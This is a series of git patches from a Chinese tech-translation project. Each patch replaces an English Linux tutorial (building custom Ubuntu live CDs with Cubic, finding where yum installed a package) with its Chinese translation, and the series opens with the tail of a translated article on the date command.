-| **%z** | +hhmm 指定数字时区 (像这样, **-0400**). |
-| **%:z** | +hh:mm 指定数字时区 (像这样, **-04:00**). |
-| **%::z** | +hh:mm:ss 指定数字时区 (像这样, **-04:00:00**). |
-| **%:::z** | 指定数字时区, 其中 “**:**” 的个数由你需要的精度来决定 (例如, **-04**, **+05:30**). |
-| **%Z** | 时区的字符缩写(例如, EDT). |
-
-#### 10\. 设置系统时间
-
-你也可以使用 date 来手工设置系统时间,方法是使用 `--set` 选项, 下面的例子会将系统时间设置成2017年8月30日下午4点22分
-
-```shell
-date --set="20170830 16:22"
-
-```
-
-当然, 如果你使用的是我们的 [VPS Hosting services][1], 你总是可以联系并咨询我们的Linux专家管理员 (通过客服电话或者下工单的方式) 关于 date 命令的任何东西. 他们是 24×7 在线的,会立即向您提供帮助.
-
-PS. 如果你喜欢这篇帖子,请点击下面的按钮分享或者留言. 谢谢.
-
---------------------------------------------------------------------------------
-
-via: https://www.rosehosting.com/blog/use-the-date-command-in-linux/
-
-作者:[][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.rosehosting.com
-[1]:https://www.rosehosting.com/hosting-services.html
From 34e88b7ad2fde28a6ab0021c03fea46ed198a826 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Mon, 8 Jan 2018 14:34:51 +0800
Subject: [PATCH 167/371] Translated by stevenzdg988 on 20171030\ How\ To\
Create\ Custom\ Ubuntu\ Live\ CD\ Image.md
---
...w To Create Custom Ubuntu Live CD Image.md | 159 ------------------
...w To Create Custom Ubuntu Live CD Image.md | 157 +++++++++++++++++
2 files changed, 157 insertions(+), 159 deletions(-)
delete mode 100644 sources/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
create mode 100644 translated/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
diff --git a/sources/tech/20171030 How To Create Custom Ubuntu Live CD Image.md b/sources/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
deleted file mode 100644
index 610efc8739..0000000000
--- a/sources/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
+++ /dev/null
@@ -1,159 +0,0 @@
-Translating by stevenzdg988 on How To Create Custom Ubuntu Live CD Image
-======
-![](https://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-720x340.png)
-
-Today let us discuss about how to create custom Ubuntu live cd image (ISO). We already have done this using [**Pinguy Builder**][1]. But, It seems to be discontinued now. I don't see any updates lately from the Pinguy builder official site. Fortunately, I found an alternative tool to create Ubuntu live cd images. Meet **Cubic** , acronym for **C** ustom **Ub** untu **I** SO **C** reator, a GUI application to create a customized bootable Ubuntu Live CD (ISO) image.
-
-Cubic is being actively developed and it offers many options to easily create a customized Ubuntu live cd. It has an integrated command-line chroot environment where you can do all customization, such as installing new packages, Kernels, adding more background wallpapers, adding additional files and folders. It has an intuitive GUI interface that allows effortless navigation (back and forth with a mouse click) during the live image creation process. You can create with a new custom image or modify existing projects. Since it is used to make Ubuntu live images, I believe it can be used in other Ubuntu flavours and derivatives such as Linux Mint.
-
-### Install Cubic
-
-Cubic developer has made a PPA to ease the installation process. To install Cubic on your Ubuntu system, run the following commands one by one in your Terminal:
-```
-sudo apt-add-repository ppa:cubic-wizard/release
-```
-```
-sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 6494C6D6997C215E
-```
-```
-sudo apt update
-```
-```
-sudo apt install cubic
-```
-
-### Create Custom Ubuntu Live Cd Image Using Cubic
-
-Once installed, launch Cubic from application menu or dock. This is how Cubic looks like in my Ubuntu 16.04 LTS desktop system.
-
-Choose a directory for your new project. It is the directory where your files will be saved.
-
-[![][2]][3]
-
-Please note that Cubic will not create a live cd of your system. Instead it just creates a custom live cd from an Ubuntu installation cd. So, you should have a latest ISO image in hand.
-
-Choose the path where you have stored your Ubuntu installation ISO image. Cubic will automatically fill out all details of your custom OS. You can change the details if you want. Click Next to continue.
-
-[![][2]][4]
-
-Next, the compressed Linux file system from the source installation medium will be extracted to your project's directory (i.e **/home/ostechnix/custom_ubuntu** in our case).
-
-[![][2]][5]
-
-Once the file system extracted, you will be landed to chroot environment automatically. If you don't see Terminal prompt, press the ENTER key few times.
-
-[![][2]][6]
-
-From here you can install any additional packages, add background images, add software sources repositories list, add latest Linux kernel to your live cd and all other customization.
-
-For example, I want vim installed in my live cd, so I am going to install it now.
-
-[![][2]][7]
-
-We don't need to "sudo", because we are already in root environment.
-
-Similarly, install any additional Linux Kernel version if you want.
-```
-apt install linux-image-extra-4.10.0-24-generic
-```
-
-Also, you can update software sources list (Add or remove repositories list):
-
-[![][2]][8]
-
-After modifying the sources list, don't forget to run "apt update" command to update the sources list:
-```
-apt update
-```
-
-Also, you can add files or folders to the live cd. Copy the files/folders (right click on them and choose copy or CTRL+C) and right click in the Terminal (inside Cubic window), choose **Paste file(s)** and finally click Copy in the bottom corner of the Cubic wizard.
-
-[![][2]][9]
-
-**Note for Ubuntu 17.10 users: **
-
-In Ubuntu 17.10 system, the DNS lookup may not work in chroot environment. If you are making a custom Ubuntu 17.10 live image, you need to point the correct file resolve.conf file:
-```
-ln -sr /run/systemd/resolve/resolv.conf /run/systemd/resolve/stub-resolv.conf
-
-```
-
-To verify DNS resolution works, run:
-```
-cat /etc/resolv.conf
-ping google.com
-```
-
-Add your own wallpapers if you want. To do so, go to the **/usr/share/backgrounds/** directory,
-```
-cd /usr/share/backgrounds
-```
-
-and drag/drop the images into the Cubic window. Or copy the images and right click on Cubic Terminal window and choose **Paste file(s)** option. Also, make sure you have added the new wallpapers in an XML file under **/usr/share/gnome-background-properties** , so you can choose the newly added image **Change Desktop Background** dialog when you right-click on your desktop. When you made all changes, click Next in Cubic wizard.
-
-In the next, choose Linux Kernel version to use when booting into the new live ISO. If you have installed any additional kernels, they will also listed in this section. Just choose the Kernel you'd like to use in your live cd.
-
-[![][2]][10]
-
-In the next section, select the packages that you want to remove from your live image. The selected packages will be automatically removed after the Ubuntu OS has been installed using the custom live image. Please be careful while choosing the packages to remove, you might have unknowingly removed a package that depends on another package.
-
-[![][2]][11]
-
-Now, the live image creation process will start. It will take some time depending upon your system's specifications.
-
-[![][2]][12]
-
-Once the image creation process completed, click Finish. Cubic will display the newly created custom image details.
-
-If you want to modify the newly create custom live image in the future, **uncheck** the option that says **" Delete all project files, except the generated disk image and the corresponding MD5 checksum file"**. Cubic will left the custom image in the project's working directory, you can make any changes in future. You don't have start all over again.
-
-To create a new live image for different Ubuntu versions, use a different project directory.
-
-### Modify Custom Ubuntu Live Cd Image Using Cubic
-
-Launch Cubic from menu, and select an existing project directory. Click the Next button, and you will see the following three options:
-
- 1. Create a disk image from the existing project.
- 2. Continue customizing the existing project.
- 3. Delete the existing project.
-
-
-
-[![][2]][13]
-
-The first option will allow you to create a new live ISO image from your existing project using the same customization you previously made. If you lost your ISO image, you can use the first option to create a new one.
-
-The second option allows you to make any additional changes in your existing project. If you choose this option, you will be landed into chroot environment again. You can add new files or folders, install any new softwares, remove any softwares, add other Linux kernels, add desktop backgrounds and so on.
-
-The third option will delete the existing project, so you can start all over from the beginning. Please that this option will delete all files including the newly generated ISO.
-
-I made a custom Ubuntu 16.04 LTS desktop live cd using Cubic. It worked just fine as described here. If you want to create an Ubuntu live cd, Cubic might be good choice.
-
-Cheers!
-
-
-
---------------------------------------------------------------------------------
-
-via: https://www.ostechnix.com/create-custom-ubuntu-live-cd-image/
-
-作者:[SK][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.ostechnix.com/author/sk/
-[1]:https://www.ostechnix.com/pinguy-builder-build-custom-ubuntu-os/
-[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
-[3]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-1.png ()
-[4]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-2.png ()
-[5]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-3.png ()
-[6]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-4.png ()
-[7]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-6.png ()
-[8]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-5.png ()
-[9]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-7.png ()
-[10]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-8.png ()
-[11]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-10-1.png ()
-[12]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-12-1.png ()
-[13]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-13.png ()
diff --git a/translated/tech/20171030 How To Create Custom Ubuntu Live CD Image.md b/translated/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
new file mode 100644
index 0000000000..b90bc3404d
--- /dev/null
+++ b/translated/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
@@ -0,0 +1,157 @@
+如何创建 Ubuntu Live CD (Linux 中国注:Ubuntu 原生光盘)的定制镜像
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-720x340.png)
+
+今天让我们来讨论一下如何创建 Ubuntu Live CD 的定制镜像(ISO)。我们已经使用[* *Pinguy Builder* *][1]完成了这项工作。但是,现在似乎停止了。最近 Pinguy Builder 的官方网站似乎没有任何更新。幸运的是,我找到了另一种创建 Ubuntu Live CD 镜像的工具。使用 **Cubic** 即 **C**ustom **Ub**untu **I**SO **C**reator (Linux 中国注:Ubuntu 镜像定制器)的首字母所写,一个 GUI (图形用户界面)应用程序用来创建一个可定制的可启动的 Ubuntu Live CD(ISO)镜像。
+
+Cubic 正在积极开发,它提供了许多选项来轻松地创建一个定制的 Ubuntu Live CD ,它有一个集成的命令行环境``chroot``(Linux 中国注:Change Root,也就是改变程序执行时所参考的根目录位置),在那里你可以定制所有,比如安装新的软件包,内核,添加更多的背景壁纸,添加更多的文件和文件夹。它有一个直观的 GUI 界面,在实时镜像创建过程中可以轻松的利用导航(可以利用点击鼠标来回切换)。您可以创建一个新的自定义镜像或修改现有的项目。因为它可以用来实时制作 Ubuntu 镜像,所以我相信它可以被利用在制作其他 Ubuntu 的发行版和衍生版镜像中使用,比如 Linux Mint。
+### 安装 Cubic
+
+Cubic 的开发人员已经开发出了一个 PPA (Linux 中国注:Personal Package Archives 首字母简写,私有的软件包档案) 来简化安装过程。要在 Ubuntu 系统上安装 Cubic ,在你的终端上运行以下命令:
+```
+sudo apt-add-repository ppa:cubic-wizard/release
+```
+```
+sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 6494C6D6997C215E
+```
+```
+sudo apt update
+```
+```
+sudo apt install cubic
+```
+
+### 利用 Cubic 创建 Ubuntu Live CD 的定制镜像
+
+
+安装完成后,从应用程序菜单或坞站启动 Cubic。这是在我在 Ubuntu 16.04 LTS 桌面系统中 Cubic 的样子。
+
+为新项目选择一个目录。它是保存镜像文件的目录。
+[![][2]][3]
+
+请注意,Cubic 不是创建您系统的 Live CD 镜像。而它只是利用 Ubuntu 安装 CD 来创建一个定制的 Live CD,因此,你应该有一个最新的 ISO 镜像。
+选择您存储 Ubuntu 安装 ISO 镜像的路径。Cubic 将自动填写您定制操作系统的所有细节。如果你愿意,你可以改变细节。单击 Next 继续。
+[![][2]][4]
+
+
+接下来,从压缩的源安装介质中的 Linux 文件系统将被提取到项目的目录(在我们的例子中目录的位置是 **/home/ostechnix/custom_ubuntu**)。
+[![][2]][5]
+
+
+一旦文件系统被提取出来,将自动加载到``chroot``环境。如果你没有看到终端提示,按下回车键几次。
+[![][2]][6]
+
+
+在这里可以安装任何额外的软件包,添加背景图片,添加软件源列表,添加最新的 Linux 内核和所有其他定制到你的 Live CD 。
+
+例如,我希望 `vim` 安装在我的 Live CD 中,所以现在就要安装它。
+[![][2]][7]
+
+
+我们不需要使用 ``sudo``,因为我们已经在具有最高权限(root)的环境中了。
+
+类似地,如果需要,可以安装添加的任何版本 Linux Kernel 。
+```
+apt install linux-image-extra-4.10.0-24-generic
+```
+
+此外,您还可以更新软件源列表(添加或删除软件存储库列表):
+[![][2]][8]
+
+修改源列表后,不要忘记运行 ``apt update`` 命令来更新源列表:
+```
+apt update
+```
+
+
+另外,您还可以向 Live CD 中添加文件或文件夹。复制文件/文件夹(右击它们并选择复制或者利用 `CTRL+C`),在终端右键单击(在 Cubic 窗口内),选择**Paste file(s)**,最后点击它将其复制进 Cubic 向导的底部。
+[![][2]][9]
+
+**Ubuntu 17.10 用户注意事项: **
+
+
+在 Ubuntu 17.10 系统中,DNS 查询可能无法在 ``chroot``环境中工作。如果您正在制作一个定制的 Ubuntu 17.10 原生镜像,您需要指向正确的 `resolve.conf` 配置文件:
+```
+ln -sr /run/systemd/resolve/resolv.conf /run/systemd/resolve/stub-resolv.conf
+
+```
+
+验证 DNS 解析工作,运行:
+```
+cat /etc/resolv.conf
+ping google.com
+```
+
+
+如果你想的话,可以添加你自己的壁纸。要做到这一点,请切换到 **/usr/share/backgrounds/** 目录,
+```
+cd /usr/share/backgrounds
+```
+
+
+并将图像拖放到 Cubic 窗口中。或复制图像,右键单击 Cubic 终端窗口,选择 **Paste file(s)** 选项。此外,确保你在**/usr/share/gnome-backproperties** 的XML文件中添加了新的壁纸,这样你可以在桌面上右键单击新添加的图像选择**Change Desktop Background** 进行交互。完成所有更改后,在 Cubic 向导中单击 ``Next``。
+
+接下来,选择引导到新的原生 ISO 镜像时使用的 Linux 内核版本。如果已经安装了其他版本内核,它们也将在这部分中被列出。然后选择您想在 Live CD 中使用的内核。
+[![][2]][10]
+
+
+在下一节中,选择要从您的原生映像中删除的软件包。在使用定制的原生映像安装完 Ubuntu 操作系统后,所选的软件包将自动删除。在选择要删除的软件包时,要格外小心,您可能在不知不觉中删除了一个软件包,而此软件包又是另外一个软件包的依赖包。
+[![][2]][11]
+
+
+接下来,原生镜像创建过程将开始。这里所要花费的时间取决于你定制的系统规格。
+[![][2]][12]
+
+
+镜像创建完成后后,单击 ``Finish``。Cubic 将显示新创建的自定义镜像的细节。
+
+如果你想在将来修改刚刚创建的自定义原生镜像,**uncheck** 选项解释说**" Delete all project files, except the generated disk image and the corresponding MD5 checksum file"** (**除了生成的磁盘映像和相应的MD5校验和文件之外,删除所有的项目文件**) Cubic 将在项目的工作目录中保留自定义图像,您可以在将来进行任何更改。而不用从头再来一遍。
+
+要为不同的 Ubuntu 版本创建新的原生镜像,最好使用不同的项目目录。
+### 利用 Cubic 修改 Ubuntu Live CD 的定制镜像
+
+从菜单中启动 Cubic ,并选择一个现有的项目目录。单击 Next 按钮,您将看到以下三个选项:
+ 1. 从现有项目创建一个磁盘映像。
+ 2. 继续定制现有项目。
+ 3. 删除当前项目。
+
+
+
+[![][2]][13]
+
+
+第一个选项将允许您使用之前所做的自定义在现有项目中创建一个新的原生 ISO 镜像。如果您丢失了 ISO 镜像,您可以使用第一个选项来创建一个新的。
+
+第二个选项允许您在现有项目中进行任何其他更改。如果您选择此选项,您将再次进入 ``chroot``环境。您可以添加新的文件或文件夹,安装任何新的软件,删除任何软件,添加其他的 Linux 内核,添加桌面背景等等。
+
+第三个选项将删除现有的项目,所以您可以从头开始。选择此选项将删除所有文件,包括新生成的 ISO 镜像文件。
+
+我用 Cubic 做了一个定制的 Ubuntu 16.04 LTS 桌面 Live CD 。就像这篇文章里描述的一样。如果你想创建一个 Ubuntu Live CD, Cubic 可能是一个不错的选择。
+
+就这些了,再会!
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/create-custom-ubuntu-live-cd-image/
+
+作者:[SK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://www.ostechnix.com/pinguy-builder-build-custom-ubuntu-os/
+[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[3]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-1.png ()
+[4]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-2.png ()
+[5]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-3.png ()
+[6]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-4.png ()
+[7]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-6.png ()
+[8]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-5.png ()
+[9]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-7.png ()
+[10]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-8.png ()
+[11]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-10-1.png ()
+[12]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-12-1.png ()
+[13]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-13.png ()
From 45ff56ccef165a6d3238c17749a757ffbbe1e9e6 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Mon, 8 Jan 2018 14:40:25 +0800
Subject: [PATCH 168/371] Translated by stevenzdg988 on 20171030\ How\ To\
Create\ Custom\ Ubuntu\ Live\ CD\ Image.md
---
.../tech/20171030 How To Create Custom Ubuntu Live CD Image.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/translated/tech/20171030 How To Create Custom Ubuntu Live CD Image.md b/translated/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
index b90bc3404d..2a6dad8027 100644
--- a/translated/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
+++ b/translated/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
@@ -136,7 +136,7 @@ cd /usr/share/backgrounds
via: https://www.ostechnix.com/create-custom-ubuntu-live-cd-image/
作者:[SK][a]
-译者:[译者ID](https://github.com/译者ID)
+译者:[stevenzdg988](https://github.com/stevenzdg988)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 9e6b6cb51e6d9718a15097c68428ae70414588c2 Mon Sep 17 00:00:00 2001
From: cyleung
Date: Mon, 8 Jan 2018 15:06:26 +0800
Subject: [PATCH 169/371] translated "yum find out path where is package
installed to on CentOS/RHEL"
---
... is package installed to on CentOS-RHEL.md | 154 ------------------
... is package installed to on CentOS-RHEL.md | 1 +
2 files changed, 1 insertion(+), 154 deletions(-)
delete mode 100644 sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
create mode 100644 translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
diff --git a/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md b/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
deleted file mode 100644
index 9f9b896d6a..0000000000
--- a/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
+++ /dev/null
@@ -1,154 +0,0 @@
-translating by cyleung
-yum find out path where is package installed to on CentOS/RHEL
-======
-
-I have [install htop package on a CentOS/RHEL][1] . I wanted find out where and at what path htop package installed all files. Is there an easy way to tell yum where is package installed on a CentOS/RHEL?
-
-[yum command][2] is an interactive, open source, rpm based, package manager for a CentOS/RHEL and clones. It can automatically perform the following operations for you:
-
- 1. Core system file updates
- 2. Package updates
- 3. Install a new packages
- 4. Delete of old packages
- 5. Perform queries on the installed and/or available packages
-
-yum is similar to other high level package managers like [apt-get command][3]/[apt command][4].
-
-### yum where is package installed
-
-The syntax is as follows to install htop package for a demo purpose:
-
-`# yum install htop`
-
-To list the files installed by a yum package called htop, run the following rpm command:
-
-```
-# rpm -q {packageNameHere}
-# rpm -ql htop
-```
-
-Sample outputs:
-
-```
-/usr/bin/htop
-/usr/share/doc/htop-2.0.2
-/usr/share/doc/htop-2.0.2/AUTHORS
-/usr/share/doc/htop-2.0.2/COPYING
-/usr/share/doc/htop-2.0.2/ChangeLog
-/usr/share/doc/htop-2.0.2/README
-/usr/share/man/man1/htop.1.gz
-/usr/share/pixmaps/htop.png
-
-```
-
-### How to see the files installed by a yum package using repoquery command
-
-First install yum-utils package using [yum command][2]:
-
-```
-# yum install yum-utils
-```
-
-Sample outputs:
-
-```
-Resolving Dependencies
---> Running transaction check
----> Package yum-utils.noarch 0:1.1.31-42.el7 will be installed
---> Processing Dependency: python-kitchen for package: yum-utils-1.1.31-42.el7.noarch
---> Processing Dependency: libxml2-python for package: yum-utils-1.1.31-42.el7.noarch
---> Running transaction check
----> Package libxml2-python.x86_64 0:2.9.1-6.el7_2.3 will be installed
----> Package python-kitchen.noarch 0:1.1.1-5.el7 will be installed
---> Finished Dependency Resolution
-
-Dependencies Resolved
-
-=======================================================================================
- Package Arch Version Repository Size
-=======================================================================================
-Installing:
- yum-utils noarch 1.1.31-42.el7 rhui-rhel-7-server-rhui-rpms 117 k
-Installing for dependencies:
- libxml2-python x86_64 2.9.1-6.el7_2.3 rhui-rhel-7-server-rhui-rpms 247 k
- python-kitchen noarch 1.1.1-5.el7 rhui-rhel-7-server-rhui-rpms 266 k
-
-Transaction Summary
-=======================================================================================
-Install 1 Package (+2 Dependent packages)
-
-Total download size: 630 k
-Installed size: 3.1 M
-Is this ok [y/d/N]: y
-Downloading packages:
-(1/3): python-kitchen-1.1.1-5.el7.noarch.rpm | 266 kB 00:00:00
-(2/3): libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm | 247 kB 00:00:00
-(3/3): yum-utils-1.1.31-42.el7.noarch.rpm | 117 kB 00:00:00
----------------------------------------------------------------------------------------
-Total 1.0 MB/s | 630 kB 00:00
-Running transaction check
-Running transaction test
-Transaction test succeeded
-Running transaction
- Installing : python-kitchen-1.1.1-5.el7.noarch 1/3
- Installing : libxml2-python-2.9.1-6.el7_2.3.x86_64 2/3
- Installing : yum-utils-1.1.31-42.el7.noarch 3/3
- Verifying : libxml2-python-2.9.1-6.el7_2.3.x86_64 1/3
- Verifying : yum-utils-1.1.31-42.el7.noarch 2/3
- Verifying : python-kitchen-1.1.1-5.el7.noarch 3/3
-
-Installed:
- yum-utils.noarch 0:1.1.31-42.el7
-
-Dependency Installed:
- libxml2-python.x86_64 0:2.9.1-6.el7_2.3 python-kitchen.noarch 0:1.1.1-5.el7
-
-Complete!
-```
-
-
-### How do I list the contents of a installed package using YUM?
-
-Now run repoquery command as follows:
-
-`# repoquery --list htop`
-
-OR
-
-`# repoquery -l htop`
-
-Sample outputs:
-
-[![yum where is package installed][5]][5]
-
-You can also use the type command or command command to just find location of given binary file such as httpd or htop:
-
-```
-$ type -a httpd
-$ type -a htop
-$ command -V htop
-```
-
-### about the author
-
-The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][6], [Facebook][7], [Google+][8].
-
---------------------------------------------------------------------------------
-
-via: https://www.cyberciti.biz/faq/yum-determining-finding-path-that-yum-package-installed-to/
-
-作者:[][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.cyberciti.biz
-[1]:https://www.cyberciti.biz/faq/centos-redhat-linux-install-htop-command-using-yum/
-[2]:https://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
-[3]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
-[4]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
-[5]:https://www.cyberciti.biz/media/new/faq/2018/01/yum-where-is-package-installed.jpg
-[6]:https://twitter.com/nixcraft
-[7]:https://facebook.com/nixcraft
-[8]:https://plus.google.com/+CybercitiBiz
diff --git a/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md b/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
new file mode 100644
index 0000000000..a5d548eae1
--- /dev/null
+++ b/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
@@ -0,0 +1 @@
+在 CentOS/RHEL 上查找 yum 安裝软件的位置
======
我已经在 CentOS/RHEL 上[安装 htop][1] 。现在想知道软件被安装在哪个位置。有没有简单的方法能找到软件包安装的目录呢?
[yum 命令][2] 是可交互的,开源的,基于 rpm 的 CentOS/RHEL 的软件包管理工具。它会帮助你自动地完成以下操作:
1. 操作系统内核更新
2. 软件包更新
3. 安装新的软件包
4. 删除旧的软件包
5. 查找已安装和可用的软件包
和 yum 相似的软件包管理工具有: [apt-get command][3] 和 [apt command][4]。
### yum 安装软件包的位置
我们以安装 htop 为例:
```
# yum install htop
```
使用以下命令列出 yum 安装 htop 的文件:
```
# rpm -q {packageNameHere}
# rpm -ql htop
```
输出例子:
```
/usr/bin/htop
/usr/share/doc/htop-2.0.2
/usr/share/doc/htop-2.0.2/AUTHORS
/usr/share/doc/htop-2.0.2/COPYING
/usr/share/doc/htop-2.0.2/ChangeLog
/usr/share/doc/htop-2.0.2/README
/usr/share/man/man1/htop.1.gz
/usr/share/pixmaps/htop.png
```
### 如何使用 repoquery 命令查看 yum 安装的软件包的位置
首先使用 [yum 命令][2] 安装 yum-utils 软件包:
```
# yum install yum-utils
```
例子输出:
```
Resolving Dependencies
--> Running transaction check
---> Package yum-utils.noarch 0:1.1.31-42.el7 will be installed
--> Processing Dependency: python-kitchen for package: yum-utils-1.1.31-42.el7.noarch
--> Processing Dependency: libxml2-python for package: yum-utils-1.1.31-42.el7.noarch
--> Running transaction check
---> Package libxml2-python.x86_64 0:2.9.1-6.el7_2.3 will be installed
---> Package python-kitchen.noarch 0:1.1.1-5.el7 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
=======================================================================================
Package Arch Version Repository Size
=======================================================================================
Installing:
yum-utils noarch 1.1.31-42.el7 rhui-rhel-7-server-rhui-rpms 117 k
Installing for dependencies:
libxml2-python x86_64 2.9.1-6.el7_2.3 rhui-rhel-7-server-rhui-rpms 247 k
python-kitchen noarch 1.1.1-5.el7 rhui-rhel-7-server-rhui-rpms 266 k
Transaction Summary
=======================================================================================
Install 1 Package (+2 Dependent packages)
Total download size: 630 k
Installed size: 3.1 M
Is this ok [y/d/N]: y
Downloading packages:
(1/3): python-kitchen-1.1.1-5.el7.noarch.rpm | 266 kB 00:00:00
(2/3): libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm | 247 kB 00:00:00
(3/3): yum-utils-1.1.31-42.el7.noarch.rpm | 117 kB 00:00:00
---------------------------------------------------------------------------------------
Total 1.0 MB/s | 630 kB 00:00
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : python-kitchen-1.1.1-5.el7.noarch 1/3
Installing : libxml2-python-2.9.1-6.el7_2.3.x86_64 2/3
Installing : yum-utils-1.1.31-42.el7.noarch 3/3
Verifying : libxml2-python-2.9.1-6.el7_2.3.x86_64 1/3
Verifying : yum-utils-1.1.31-42.el7.noarch 2/3
Verifying : python-kitchen-1.1.1-5.el7.noarch 3/3
Installed:
yum-utils.noarch 0:1.1.31-42.el7
Dependency Installed:
libxml2-python.x86_64 0:2.9.1-6.el7_2.3 python-kitchen.noarch 0:1.1.1-5.el7
Complete!
```
### 如何列出通过 yum 安装的命令?
使用 repoquery 命令:
`# repoquery --list htop`
或者
`# repoquery -l htop`
例子输出:
[![yum where is package installed][5]][5]
你也可以使用 type 命令或者 command 命令查找指定二进制文件的位置,例如 httpd 或者 htop :
```
$ type -a httpd
$ type -a htop
$ command -V htop
```
### 关于作者
作者是 nixCraft 的创始人,是经验丰富的系统管理员并且是 Linux 命令行脚本编程的教练。他拥有全球多行业合作的经验,客户包括 IT,教育,安防和空间研究。他的联系方式:[Twitter][6], [Facebook][7], [Google+][8]。
--------------------------------------------------------------------------------
via: https://www.cyberciti.biz/faq/yum-determining-finding-path-that-yum-package-installed-to/
作者:[][a]
译者:[译者 ID](https://github.com/cyleung)
校对:[校对者 ID](https://github.com/ 校对者 ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux 中国](https://linux.cn/) 荣誉推出
[a]:https://www.cyberciti.biz
[1]:https://www.cyberciti.biz/faq/centos-redhat-linux-install-htop-command-using-yum/
[2]:https://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
[3]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
[4]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
[5]:https://www.cyberciti.biz/media/new/faq/2018/01/yum-where-is-package-installed.jpg
[6]:https://twitter.com/nixcraft
[7]:https://facebook.com/nixcraft
[8]:https://plus.google.com/+CybercitiBiz
\ No newline at end of file
From 5e3f01a110f62526ee86d3806f3faf6fe24d28f7 Mon Sep 17 00:00:00 2001
From: cyleung
Date: Mon, 8 Jan 2018 15:25:05 +0800
Subject: [PATCH 170/371] =?UTF-8?q?=E4=BF=AE=E5=A4=8D=E6=8D=A2=E8=A1=8C?=
=?UTF-8?q?=E7=AC=A6?=
